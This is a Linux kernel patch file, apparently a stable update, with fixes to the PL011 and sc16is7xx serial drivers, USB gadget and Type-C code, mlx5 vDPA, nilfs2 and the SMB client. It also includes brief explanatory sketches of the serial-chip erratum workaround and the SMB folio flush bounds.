+-	sgbuf = uap->dmarx.use_buf_b ?
+-		&uap->dmarx.sgbuf_b : &uap->dmarx.sgbuf_a;
+-	desc = dmaengine_prep_slave_sg(rxchan, &sgbuf->sg, 1,
++	dbuf = uap->dmarx.use_buf_b ?
++		&uap->dmarx.dbuf_b : &uap->dmarx.dbuf_a;
++	desc = dmaengine_prep_slave_single(rxchan, dbuf->dma, dbuf->len,
+ 					DMA_DEV_TO_MEM,
+ 					DMA_PREP_INTERRUPT | DMA_CTRL_ACK);
+ 	/*
+@@ -876,8 +871,8 @@ static void pl011_dma_rx_chars(struct uart_amba_port *uap,
+ 			       bool readfifo)
+ {
+ 	struct tty_port *port = &uap->port.state->port;
+-	struct pl011_sgbuf *sgbuf = use_buf_b ?
+-		&uap->dmarx.sgbuf_b : &uap->dmarx.sgbuf_a;
++	struct pl011_dmabuf *dbuf = use_buf_b ?
++		&uap->dmarx.dbuf_b : &uap->dmarx.dbuf_a;
+ 	int dma_count = 0;
+ 	u32 fifotaken = 0; /* only used for vdbg() */
+ 
+@@ -886,7 +881,7 @@ static void pl011_dma_rx_chars(struct uart_amba_port *uap,
+ 
+ 	if (uap->dmarx.poll_rate) {
+ 		/* The data can be taken by polling */
+-		dmataken = sgbuf->sg.length - dmarx->last_residue;
++		dmataken = dbuf->len - dmarx->last_residue;
+ 		/* Recalculate the pending size */
+ 		if (pending >= dmataken)
+ 			pending -= dmataken;
+@@ -900,7 +895,7 @@ static void pl011_dma_rx_chars(struct uart_amba_port *uap,
+ 		 * Note that tty_insert_flip_buf() tries to take as many chars
+ 		 * as it can.
+ 		 */
+-		dma_count = tty_insert_flip_string(port, sgbuf->buf + dmataken,
++		dma_count = tty_insert_flip_string(port, dbuf->buf + dmataken,
+ 				pending);
+ 
+ 		uap->port.icount.rx += dma_count;
+@@ -911,7 +906,7 @@ static void pl011_dma_rx_chars(struct uart_amba_port *uap,
+ 
+ 	/* Reset the last_residue for Rx DMA poll */
+ 	if (uap->dmarx.poll_rate)
+-		dmarx->last_residue = sgbuf->sg.length;
++		dmarx->last_residue = dbuf->len;
+ 
+ 	/*
+ 	 * Only continue with trying to read the FIFO if all DMA chars have
+@@ -946,8 +941,8 @@ static void pl011_dma_rx_irq(struct uart_amba_port *uap)
+ {
+ 	struct pl011_dmarx_data *dmarx = &uap->dmarx;
+ 	struct dma_chan *rxchan = dmarx->chan;
+-	struct pl011_sgbuf *sgbuf = dmarx->use_buf_b ?
+-		&dmarx->sgbuf_b : &dmarx->sgbuf_a;
++	struct pl011_dmabuf *dbuf = dmarx->use_buf_b ?
++		&dmarx->dbuf_b : &dmarx->dbuf_a;
+ 	size_t pending;
+ 	struct dma_tx_state state;
+ 	enum dma_status dmastat;
+@@ -969,7 +964,7 @@ static void pl011_dma_rx_irq(struct uart_amba_port *uap)
+ 	pl011_write(uap->dmacr, uap, REG_DMACR);
+ 	uap->dmarx.running = false;
+ 
+-	pending = sgbuf->sg.length - state.residue;
++	pending = dbuf->len - state.residue;
+ 	BUG_ON(pending > PL011_DMA_BUFFER_SIZE);
+ 	/* Then we terminate the transfer - we now know our residue */
+ 	dmaengine_terminate_all(rxchan);
+@@ -996,8 +991,8 @@ static void pl011_dma_rx_callback(void *data)
+ 	struct pl011_dmarx_data *dmarx = &uap->dmarx;
+ 	struct dma_chan *rxchan = dmarx->chan;
+ 	bool lastbuf = dmarx->use_buf_b;
+-	struct pl011_sgbuf *sgbuf = dmarx->use_buf_b ?
+-		&dmarx->sgbuf_b : &dmarx->sgbuf_a;
++	struct pl011_dmabuf *dbuf = dmarx->use_buf_b ?
++		&dmarx->dbuf_b : &dmarx->dbuf_a;
+ 	size_t pending;
+ 	struct dma_tx_state state;
+ 	int ret;
+@@ -1015,7 +1010,7 @@ static void pl011_dma_rx_callback(void *data)
+ 	 * the DMA irq handler. So we check the residue here.
+ 	 */
+ 	rxchan->device->device_tx_status(rxchan, dmarx->cookie, &state);
+-	pending = sgbuf->sg.length - state.residue;
++	pending = dbuf->len - state.residue;
+ 	BUG_ON(pending > PL011_DMA_BUFFER_SIZE);
+ 	/* Then we terminate the transfer - we now know our residue */
+ 	dmaengine_terminate_all(rxchan);
+@@ -1067,16 +1062,16 @@ static void pl011_dma_rx_poll(struct timer_list *t)
+ 	unsigned long flags;
+ 	unsigned int dmataken = 0;
+ 	unsigned int size = 0;
+-	struct pl011_sgbuf *sgbuf;
++	struct pl011_dmabuf *dbuf;
+ 	int dma_count;
+ 	struct dma_tx_state state;
+ 
+-	sgbuf = dmarx->use_buf_b ? &uap->dmarx.sgbuf_b : &uap->dmarx.sgbuf_a;
++	dbuf = dmarx->use_buf_b ? &uap->dmarx.dbuf_b : &uap->dmarx.dbuf_a;
+ 	rxchan->device->device_tx_status(rxchan, dmarx->cookie, &state);
+ 	if (likely(state.residue < dmarx->last_residue)) {
+-		dmataken = sgbuf->sg.length - dmarx->last_residue;
++		dmataken = dbuf->len - dmarx->last_residue;
+ 		size = dmarx->last_residue - state.residue;
+-		dma_count = tty_insert_flip_string(port, sgbuf->buf + dmataken,
++		dma_count = tty_insert_flip_string(port, dbuf->buf + dmataken,
+ 				size);
+ 		if (dma_count == size)
+ 			dmarx->last_residue =  state.residue;
+@@ -1123,7 +1118,7 @@ static void pl011_dma_startup(struct uart_amba_port *uap)
+ 		return;
+ 	}
+ 
+-	sg_init_one(&uap->dmatx.sg, uap->dmatx.buf, PL011_DMA_BUFFER_SIZE);
++	uap->dmatx.len = PL011_DMA_BUFFER_SIZE;
+ 
+ 	/* The DMA buffer is now the FIFO the TTY subsystem can use */
+ 	uap->port.fifosize = PL011_DMA_BUFFER_SIZE;
+@@ -1133,7 +1128,7 @@ static void pl011_dma_startup(struct uart_amba_port *uap)
+ 		goto skip_rx;
+ 
+ 	/* Allocate and map DMA RX buffers */
+-	ret = pl011_sgbuf_init(uap->dmarx.chan, &uap->dmarx.sgbuf_a,
++	ret = pl011_dmabuf_init(uap->dmarx.chan, &uap->dmarx.dbuf_a,
+ 			       DMA_FROM_DEVICE);
+ 	if (ret) {
+ 		dev_err(uap->port.dev, "failed to init DMA %s: %d\n",
+@@ -1141,12 +1136,12 @@ static void pl011_dma_startup(struct uart_amba_port *uap)
+ 		goto skip_rx;
+ 	}
+ 
+-	ret = pl011_sgbuf_init(uap->dmarx.chan, &uap->dmarx.sgbuf_b,
++	ret = pl011_dmabuf_init(uap->dmarx.chan, &uap->dmarx.dbuf_b,
+ 			       DMA_FROM_DEVICE);
+ 	if (ret) {
+ 		dev_err(uap->port.dev, "failed to init DMA %s: %d\n",
+ 			"RX buffer B", ret);
+-		pl011_sgbuf_free(uap->dmarx.chan, &uap->dmarx.sgbuf_a,
++		pl011_dmabuf_free(uap->dmarx.chan, &uap->dmarx.dbuf_a,
+ 				 DMA_FROM_DEVICE);
+ 		goto skip_rx;
+ 	}
+@@ -1200,8 +1195,9 @@ static void pl011_dma_shutdown(struct uart_amba_port *uap)
+ 		/* In theory, this should already be done by pl011_dma_flush_buffer */
+ 		dmaengine_terminate_all(uap->dmatx.chan);
+ 		if (uap->dmatx.queued) {
+-			dma_unmap_sg(uap->dmatx.chan->device->dev, &uap->dmatx.sg, 1,
+-				     DMA_TO_DEVICE);
++			dma_unmap_single(uap->dmatx.chan->device->dev,
++					 uap->dmatx.dma, uap->dmatx.len,
++					 DMA_TO_DEVICE);
+ 			uap->dmatx.queued = false;
+ 		}
+ 
+@@ -1212,8 +1208,8 @@ static void pl011_dma_shutdown(struct uart_amba_port *uap)
+ 	if (uap->using_rx_dma) {
+ 		dmaengine_terminate_all(uap->dmarx.chan);
+ 		/* Clean up the RX DMA */
+-		pl011_sgbuf_free(uap->dmarx.chan, &uap->dmarx.sgbuf_a, DMA_FROM_DEVICE);
+-		pl011_sgbuf_free(uap->dmarx.chan, &uap->dmarx.sgbuf_b, DMA_FROM_DEVICE);
++		pl011_dmabuf_free(uap->dmarx.chan, &uap->dmarx.dbuf_a, DMA_FROM_DEVICE);
++		pl011_dmabuf_free(uap->dmarx.chan, &uap->dmarx.dbuf_b, DMA_FROM_DEVICE);
+ 		if (uap->dmarx.poll_rate)
+ 			del_timer_sync(&uap->dmarx.timer);
+ 		uap->using_rx_dma = false;
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index b398fba942964..b4b849415c503 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -769,6 +769,18 @@ static bool sc16is7xx_port_irq(struct sc16is7xx_port *s, int portno)
+ 		case SC16IS7XX_IIR_RTOI_SRC:
+ 		case SC16IS7XX_IIR_XOFFI_SRC:
+ 			rxlen = sc16is7xx_port_read(port, SC16IS7XX_RXLVL_REG);
++
++			/*
++			 * There is a silicon bug that makes the chip report a
++			 * time-out interrupt but no data in the FIFO. This is
++			 * described in errata section 18.1.4.
++			 *
++			 * When this happens, read one byte from the FIFO to
++			 * clear the interrupt.
++			 */
++			if (iir == SC16IS7XX_IIR_RTOI_SRC && !rxlen)
++				rxlen = 1;
++
+ 			if (rxlen)
+ 				sc16is7xx_handle_rx(port, rxlen, iir);
+ 			break;
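
The sc16is7xx change works around a chip erratum: the time-out interrupt can assert with nothing in the FIFO, and only a dummy read clears it. A stubbed sketch of the decision, with register access reduced to a function returning 0; the IIR constant here is an assumption, not the chip datasheet:

#include <stdio.h>

#define IIR_RTOI_SRC 0x0c /* placeholder for the time-out interrupt source */

static unsigned read_rxlvl(void) { return 0; } /* stub: FIFO reports empty */

static unsigned rx_bytes_to_read(unsigned iir)
{
	unsigned rxlen = read_rxlvl();

	/* Errata 18.1.4: time-out asserted but RXLVL == 0, so read one
	 * byte anyway to clear the stuck interrupt. */
	if (iir == IIR_RTOI_SRC && !rxlen)
		rxlen = 1;
	return rxlen;
}

int main(void)
{
	printf("bytes to read: %u\n", rx_bytes_to_read(IIR_RTOI_SRC));
	return 0;
}
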
+diff --git a/drivers/usb/gadget/function/f_hid.c b/drivers/usb/gadget/function/f_hid.c
+index 6be6009f911e1..f1ca9250cad96 100644
+--- a/drivers/usb/gadget/function/f_hid.c
++++ b/drivers/usb/gadget/function/f_hid.c
+@@ -88,6 +88,7 @@ static void hidg_release(struct device *dev)
+ {
+ 	struct f_hidg *hidg = container_of(dev, struct f_hidg, dev);
+ 
++	kfree(hidg->report_desc);
+ 	kfree(hidg->set_report_buf);
+ 	kfree(hidg);
+ }
+@@ -1287,9 +1288,9 @@ static struct usb_function *hidg_alloc(struct usb_function_instance *fi)
+ 	hidg->report_length = opts->report_length;
+ 	hidg->report_desc_length = opts->report_desc_length;
+ 	if (opts->report_desc) {
+-		hidg->report_desc = devm_kmemdup(&hidg->dev, opts->report_desc,
+-						 opts->report_desc_length,
+-						 GFP_KERNEL);
++		hidg->report_desc = kmemdup(opts->report_desc,
++					    opts->report_desc_length,
++					    GFP_KERNEL);
+ 		if (!hidg->report_desc) {
+ 			put_device(&hidg->dev);
+ 			--opts->refcnt;
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 1c0c61e8ba696..c40f2ecbe1b8c 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -1608,8 +1608,6 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	dev_dbg(&udc->dev, "unbinding gadget driver [%s]\n", driver->function);
+ 
+-	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+-
+ 	udc->allow_connect = false;
+ 	cancel_work_sync(&udc->vbus_work);
+ 	mutex_lock(&udc->connect_lock);
+@@ -1629,6 +1627,8 @@ static void gadget_unbind_driver(struct device *dev)
+ 	driver->is_bound = false;
+ 	udc->driver = NULL;
+ 	mutex_unlock(&udc_lock);
++
++	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ }
+ 
+ /* ------------------------------------------------------------------------- */
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 24bcf6ab12d8a..e02ef31da68e4 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -348,8 +348,6 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 	/* xHC spec requires PCI devices to support D3hot and D3cold */
+ 	if (xhci->hci_version >= 0x120)
+ 		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
+-	else if (pdev->vendor == PCI_VENDOR_ID_AMD && xhci->hci_version >= 0x110)
+-		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
+ 
+ 	if (xhci->quirks & XHCI_RESET_ON_RESUME)
+ 		xhci_dbg_trace(xhci, trace_xhci_dbg_quirks,
+diff --git a/drivers/usb/typec/class.c b/drivers/usb/typec/class.c
+index 3c3bab33e03a5..49d6b2388b874 100644
+--- a/drivers/usb/typec/class.c
++++ b/drivers/usb/typec/class.c
+@@ -267,7 +267,7 @@ static void typec_altmode_put_partner(struct altmode *altmode)
+ 	if (!partner)
+ 		return;
+ 
+-	adev = &partner->adev;
++	adev = &altmode->adev;
+ 
+ 	if (is_typec_plug(adev->dev.parent)) {
+ 		struct typec_plug *plug = to_typec_plug(adev->dev.parent);
+@@ -497,7 +497,8 @@ static void typec_altmode_release(struct device *dev)
+ {
+ 	struct altmode *alt = to_altmode(to_typec_altmode(dev));
+ 
+-	typec_altmode_put_partner(alt);
++	if (!is_typec_port(dev->parent))
++		typec_altmode_put_partner(alt);
+ 
+ 	altmode_id_remove(alt->adev.dev.parent, alt->id);
+ 	kfree(alt);
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index bf99654371b35..2b7e796c48897 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -2508,13 +2508,18 @@ static int setup_cvq_vring(struct mlx5_vdpa_dev *mvdev)
+ 	struct mlx5_control_vq *cvq = &mvdev->cvq;
+ 	int err = 0;
+ 
+-	if (mvdev->actual_features & BIT_ULL(VIRTIO_NET_F_CTRL_VQ))
++	if (mvdev->actual_features & BIT_ULL(VIRTIO_NET_F_CTRL_VQ)) {
++		u16 idx = cvq->vring.last_avail_idx;
++
+ 		err = vringh_init_iotlb(&cvq->vring, mvdev->actual_features,
+ 					MLX5_CVQ_MAX_ENT, false,
+ 					(struct vring_desc *)(uintptr_t)cvq->desc_addr,
+ 					(struct vring_avail *)(uintptr_t)cvq->driver_addr,
+ 					(struct vring_used *)(uintptr_t)cvq->device_addr);
+ 
++		if (!err)
++			cvq->vring.last_avail_idx = cvq->vring.last_used_idx = idx;
++	}
+ 	return err;
+ }
+ 
+diff --git a/fs/nilfs2/sufile.c b/fs/nilfs2/sufile.c
+index 2c6078a6b8ecb..58ca7c936393c 100644
+--- a/fs/nilfs2/sufile.c
++++ b/fs/nilfs2/sufile.c
+@@ -501,15 +501,38 @@ int nilfs_sufile_mark_dirty(struct inode *sufile, __u64 segnum)
+ 
+ 	down_write(&NILFS_MDT(sufile)->mi_sem);
+ 	ret = nilfs_sufile_get_segment_usage_block(sufile, segnum, 0, &bh);
+-	if (!ret) {
+-		mark_buffer_dirty(bh);
+-		nilfs_mdt_mark_dirty(sufile);
+-		kaddr = kmap_atomic(bh->b_page);
+-		su = nilfs_sufile_block_get_segment_usage(sufile, segnum, bh, kaddr);
++	if (ret)
++		goto out_sem;
++
++	kaddr = kmap_atomic(bh->b_page);
++	su = nilfs_sufile_block_get_segment_usage(sufile, segnum, bh, kaddr);
++	if (unlikely(nilfs_segment_usage_error(su))) {
++		struct the_nilfs *nilfs = sufile->i_sb->s_fs_info;
++
++		kunmap_atomic(kaddr);
++		brelse(bh);
++		if (nilfs_segment_is_active(nilfs, segnum)) {
++			nilfs_error(sufile->i_sb,
++				    "active segment %llu is erroneous",
++				    (unsigned long long)segnum);
++		} else {
++			/*
++			 * Segments marked erroneous are never allocated by
++			 * nilfs_sufile_alloc(); only active segments, i.e.,
++			 * the segments indexed by ns_segnum or ns_nextnum,
++			 * can be erroneous here.
++			 */
++			WARN_ON_ONCE(1);
++		}
++		ret = -EIO;
++	} else {
+ 		nilfs_segment_usage_set_dirty(su);
+ 		kunmap_atomic(kaddr);
++		mark_buffer_dirty(bh);
++		nilfs_mdt_mark_dirty(sufile);
+ 		brelse(bh);
+ 	}
++out_sem:
+ 	up_write(&NILFS_MDT(sufile)->mi_sem);
+ 	return ret;
+ }
+@@ -536,9 +559,14 @@ int nilfs_sufile_set_segment_usage(struct inode *sufile, __u64 segnum,
+ 
+ 	kaddr = kmap_atomic(bh->b_page);
+ 	su = nilfs_sufile_block_get_segment_usage(sufile, segnum, bh, kaddr);
+-	WARN_ON(nilfs_segment_usage_error(su));
+-	if (modtime)
++	if (modtime) {
++		/*
++		 * Check segusage error and set su_lastmod only when updating
++		 * this entry with a valid timestamp, not for cancellation.
++		 */
++		WARN_ON_ONCE(nilfs_segment_usage_error(su));
+ 		su->su_lastmod = cpu_to_le64(modtime);
++	}
+ 	su->su_nblocks = cpu_to_le32(nblocks);
+ 	kunmap_atomic(kaddr);
+ 
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 0f0667957c810..71400496ed365 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -716,7 +716,11 @@ int init_nilfs(struct the_nilfs *nilfs, struct super_block *sb, char *data)
+ 			goto failed_sbh;
+ 		}
+ 		nilfs_release_super_block(nilfs);
+-		sb_set_blocksize(sb, blocksize);
++		if (!sb_set_blocksize(sb, blocksize)) {
++			nilfs_err(sb, "bad blocksize %d", blocksize);
++			err = -EINVAL;
++			goto out;
++		}
+ 
+ 		err = nilfs_load_super_block(nilfs, sb, blocksize, &sbp);
+ 		if (err)
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 33ea1440f4b06..2e15b182e59fc 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1191,32 +1191,103 @@ const struct inode_operations cifs_symlink_inode_ops = {
+ 	.listxattr = cifs_listxattr,
+ };
+ 
++/*
++ * Advance the EOF marker to after the source range.
++ */
++static int cifs_precopy_set_eof(struct inode *src_inode, struct cifsInodeInfo *src_cifsi,
++				struct cifs_tcon *src_tcon,
++				unsigned int xid, loff_t src_end)
++{
++	struct cifsFileInfo *writeable_srcfile;
++	int rc = -EINVAL;
++
++	writeable_srcfile = find_writable_file(src_cifsi, FIND_WR_FSUID_ONLY);
++	if (writeable_srcfile) {
++		if (src_tcon->ses->server->ops->set_file_size)
++			rc = src_tcon->ses->server->ops->set_file_size(
++				xid, src_tcon, writeable_srcfile,
++				src_inode->i_size, true /* no need to set sparse */);
++		else
++			rc = -ENOSYS;
++		cifsFileInfo_put(writeable_srcfile);
++		cifs_dbg(FYI, "SetFSize for copychunk rc = %d\n", rc);
++	}
++
++	if (rc < 0)
++		goto set_failed;
++
++	netfs_resize_file(&src_cifsi->netfs, src_end);
++	fscache_resize_cookie(cifs_inode_cookie(src_inode), src_end);
++	return 0;
++
++set_failed:
++	return filemap_write_and_wait(src_inode->i_mapping);
++}
++
++/*
++ * Flush out either the folio that overlaps the beginning of a range in which
++ * pos resides or the folio that overlaps the end of a range unless that folio
++ * is entirely within the range we're going to invalidate.  We extend the flush
++ * bounds to encompass the folio.
++ */
++static int cifs_flush_folio(struct inode *inode, loff_t pos, loff_t *_fstart, loff_t *_fend,
++			    bool first)
++{
++	struct folio *folio;
++	unsigned long long fpos, fend;
++	pgoff_t index = pos / PAGE_SIZE;
++	size_t size;
++	int rc = 0;
++
++	folio = filemap_get_folio(inode->i_mapping, index);
++	if (IS_ERR(folio))
++		return 0;
++
++	size = folio_size(folio);
++	fpos = folio_pos(folio);
++	fend = fpos + size - 1;
++	*_fstart = min_t(unsigned long long, *_fstart, fpos);
++	*_fend   = max_t(unsigned long long, *_fend, fend);
++	if ((first && pos == fpos) || (!first && pos == fend))
++		goto out;
++
++	rc = filemap_write_and_wait_range(inode->i_mapping, fpos, fend);
++out:
++	folio_put(folio);
++	return rc;
++}
++
+ static loff_t cifs_remap_file_range(struct file *src_file, loff_t off,
+ 		struct file *dst_file, loff_t destoff, loff_t len,
+ 		unsigned int remap_flags)
+ {
+ 	struct inode *src_inode = file_inode(src_file);
+ 	struct inode *target_inode = file_inode(dst_file);
++	struct cifsInodeInfo *src_cifsi = CIFS_I(src_inode);
++	struct cifsInodeInfo *target_cifsi = CIFS_I(target_inode);
+ 	struct cifsFileInfo *smb_file_src = src_file->private_data;
+-	struct cifsFileInfo *smb_file_target;
+-	struct cifs_tcon *target_tcon;
++	struct cifsFileInfo *smb_file_target = dst_file->private_data;
++	struct cifs_tcon *target_tcon, *src_tcon;
++	unsigned long long destend, fstart, fend, new_size;
+ 	unsigned int xid;
+ 	int rc;
+ 
+-	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++	if (remap_flags & REMAP_FILE_DEDUP)
++		return -EOPNOTSUPP;
++	if (remap_flags & ~REMAP_FILE_ADVISORY)
+ 		return -EINVAL;
+ 
+ 	cifs_dbg(FYI, "clone range\n");
+ 
+ 	xid = get_xid();
+ 
+-	if (!src_file->private_data || !dst_file->private_data) {
++	if (!smb_file_src || !smb_file_target) {
+ 		rc = -EBADF;
+ 		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
+ 		goto out;
+ 	}
+ 
+-	smb_file_target = dst_file->private_data;
++	src_tcon = tlink_tcon(smb_file_src->tlink);
+ 	target_tcon = tlink_tcon(smb_file_target->tlink);
+ 
+ 	/*
+@@ -1229,20 +1300,63 @@ static loff_t cifs_remap_file_range(struct file *src_file, loff_t off,
+ 	if (len == 0)
+ 		len = src_inode->i_size - off;
+ 
+-	cifs_dbg(FYI, "about to flush pages\n");
+-	/* should we flush first and last page first */
+-	truncate_inode_pages_range(&target_inode->i_data, destoff,
+-				   PAGE_ALIGN(destoff + len)-1);
++	cifs_dbg(FYI, "clone range\n");
+ 
+-	if (target_tcon->ses->server->ops->duplicate_extents)
++	/* Flush the source buffer */
++	rc = filemap_write_and_wait_range(src_inode->i_mapping, off,
++					  off + len - 1);
++	if (rc)
++		goto unlock;
++
++	/* The server-side copy will fail if the source crosses the EOF marker.
++	 * Advance the EOF marker after the flush above to the end of the range
++	 * if it's short of that.
++	 */
++	if (src_cifsi->netfs.remote_i_size < off + len) {
++		rc = cifs_precopy_set_eof(src_inode, src_cifsi, src_tcon, xid, off + len);
++		if (rc < 0)
++			goto unlock;
++	}
++
++	new_size = destoff + len;
++	destend = destoff + len - 1;
++
++	/* Flush the folios at either end of the destination range to prevent
++	 * accidental loss of dirty data outside of the range.
++	 */
++	fstart = destoff;
++	fend = destend;
++
++	rc = cifs_flush_folio(target_inode, destoff, &fstart, &fend, true);
++	if (rc)
++		goto unlock;
++	rc = cifs_flush_folio(target_inode, destend, &fstart, &fend, false);
++	if (rc)
++		goto unlock;
++
++	/* Discard all the folios that overlap the destination region. */
++	cifs_dbg(FYI, "about to discard pages %llx-%llx\n", fstart, fend);
++	truncate_inode_pages_range(&target_inode->i_data, fstart, fend);
++
++	fscache_invalidate(cifs_inode_cookie(target_inode), NULL,
++			   i_size_read(target_inode), 0);
++
++	rc = -EOPNOTSUPP;
++	if (target_tcon->ses->server->ops->duplicate_extents) {
+ 		rc = target_tcon->ses->server->ops->duplicate_extents(xid,
+ 			smb_file_src, smb_file_target, off, len, destoff);
+-	else
+-		rc = -EOPNOTSUPP;
++		if (rc == 0 && new_size > i_size_read(target_inode)) {
++			truncate_setsize(target_inode, new_size);
++			netfs_resize_file(&target_cifsi->netfs, new_size);
++			fscache_resize_cookie(cifs_inode_cookie(target_inode),
++					      new_size);
++		}
++	}
+ 
+ 	/* force revalidate of size and timestamps of target file now
+ 	   that target is updated on the server */
+ 	CIFS_I(target_inode)->time = 0;
++unlock:
+ 	/* although unlocking in the reverse order from locking is not
+ 	   strictly necessary here it is a little cleaner to be consistent */
+ 	unlock_two_nondirectories(src_inode, target_inode);
+@@ -1258,10 +1372,12 @@ ssize_t cifs_file_copychunk_range(unsigned int xid,
+ {
+ 	struct inode *src_inode = file_inode(src_file);
+ 	struct inode *target_inode = file_inode(dst_file);
++	struct cifsInodeInfo *src_cifsi = CIFS_I(src_inode);
+ 	struct cifsFileInfo *smb_file_src;
+ 	struct cifsFileInfo *smb_file_target;
+ 	struct cifs_tcon *src_tcon;
+ 	struct cifs_tcon *target_tcon;
++	unsigned long long destend, fstart, fend;
+ 	ssize_t rc;
+ 
+ 	cifs_dbg(FYI, "copychunk range\n");
+@@ -1301,13 +1417,41 @@ ssize_t cifs_file_copychunk_range(unsigned int xid,
+ 	if (rc)
+ 		goto unlock;
+ 
+-	/* should we flush first and last page first */
+-	truncate_inode_pages(&target_inode->i_data, 0);
++	/* The server-side copy will fail if the source crosses the EOF marker.
++	 * Advance the EOF marker after the flush above to the end of the range
++	 * if it's short of that.
++	 */
++	if (src_cifsi->server_eof < off + len) {
++		rc = cifs_precopy_set_eof(src_inode, src_cifsi, src_tcon, xid, off + len);
++		if (rc < 0)
++			goto unlock;
++	}
++
++	destend = destoff + len - 1;
++
++	/* Flush the folios at either end of the destination range to prevent
++	 * accidental loss of dirty data outside of the range.
++	 */
++	fstart = destoff;
++	fend = destend;
++
++	rc = cifs_flush_folio(target_inode, destoff, &fstart, &fend, true);
++	if (rc)
++		goto unlock;
++	rc = cifs_flush_folio(target_inode, destend, &fstart, &fend, false);
++	if (rc)
++		goto unlock;
++
++	/* Discard all the folios that overlap the destination region. */
++	truncate_inode_pages_range(&target_inode->i_data, fstart, fend);
+ 
+ 	rc = file_modified(dst_file);
+-	if (!rc)
++	if (!rc) {
+ 		rc = target_tcon->ses->server->ops->copychunk_range(xid,
+ 			smb_file_src, smb_file_target, off, len, destoff);
++		if (rc > 0 && destoff + rc > i_size_read(target_inode))
++			truncate_setsize(target_inode, destoff + rc);
++	}
+ 
+ 	file_accessed(src_file);
+ 
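
The helper's bounds arithmetic is worth seeing in isolation: each end of the destination range widens [fstart, fend] out to full folio boundaries before the invalidation. A simplified sketch assuming fixed 4 KiB folios:

#include <stdio.h>

#define PAGE_SIZE 4096ULL

static void widen_bounds(unsigned long long pos,
			 unsigned long long *fstart, unsigned long long *fend)
{
	unsigned long long fpos = pos & ~(PAGE_SIZE - 1); /* folio start */
	unsigned long long fe = fpos + PAGE_SIZE - 1;     /* folio end */

	if (fpos < *fstart)
		*fstart = fpos;
	if (fe > *fend)
		*fend = fe;
}

int main(void)
{
	unsigned long long destoff = 5000, destend = 12287;
	unsigned long long fstart = destoff, fend = destend;

	widen_bounds(destoff, &fstart, &fend);
	widen_bounds(destend, &fstart, &fend);
	printf("invalidate %llu-%llu\n", fstart, fend); /* 4096-12287 */
	return 0;
}
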
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index e628848a1df93..6ef3c00de5ca1 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -2834,6 +2834,8 @@ smb2_get_dfs_refer(const unsigned int xid, struct cifs_ses *ses,
+ 		usleep_range(512, 2048);
+ 	} while (++retry_count < 5);
+ 
++	if (!rc && !dfs_rsp)
++		rc = -EIO;
+ 	if (rc) {
+ 		if (!is_retryable_error(rc) && rc != -ENOENT && rc != -EOPNOTSUPP)
+ 			cifs_tcon_dbg(VFS, "%s: ioctl error: rc=%d\n", __func__, rc);
+diff --git a/include/linux/cpuhotplug.h b/include/linux/cpuhotplug.h
+index c7e0d80dbf6a5..67575bc8a7e29 100644
+--- a/include/linux/cpuhotplug.h
++++ b/include/linux/cpuhotplug.h
+@@ -196,6 +196,7 @@ enum cpuhp_state {
+ 	CPUHP_AP_ARM_CORESIGHT_CTI_STARTING,
+ 	CPUHP_AP_ARM64_ISNDEP_STARTING,
+ 	CPUHP_AP_SMPCFD_DYING,
++	CPUHP_AP_HRTIMERS_DYING,
+ 	CPUHP_AP_X86_TBOOT_DYING,
+ 	CPUHP_AP_ARM_CACHE_B15_RAC_DYING,
+ 	CPUHP_AP_ONLINE,
+diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
+index 0ee140176f102..f2044d5a652b5 100644
+--- a/include/linux/hrtimer.h
++++ b/include/linux/hrtimer.h
+@@ -531,9 +531,9 @@ extern void sysrq_timer_list_show(void);
+ 
+ int hrtimers_prepare_cpu(unsigned int cpu);
+ #ifdef CONFIG_HOTPLUG_CPU
+-int hrtimers_dead_cpu(unsigned int cpu);
++int hrtimers_cpu_dying(unsigned int cpu);
+ #else
+-#define hrtimers_dead_cpu	NULL
++#define hrtimers_cpu_dying	NULL
+ #endif
+ 
+ #endif
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index e46f6b49eb389..1c6f35ba1604f 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -880,10 +880,7 @@ static inline bool hugepage_migration_supported(struct hstate *h)
+ 	return arch_hugetlb_migration_supported(h);
+ }
+ 
+-static inline bool __vma_private_lock(struct vm_area_struct *vma)
+-{
+-	return (!(vma->vm_flags & VM_MAYSHARE)) && vma->vm_private_data;
+-}
++bool __vma_private_lock(struct vm_area_struct *vma);
+ 
+ /*
+  * Movability check is different as compared to migration check.
+diff --git a/include/linux/iommu.h b/include/linux/iommu.h
+index 3c9da1f8979e3..9d87090953bcc 100644
+--- a/include/linux/iommu.h
++++ b/include/linux/iommu.h
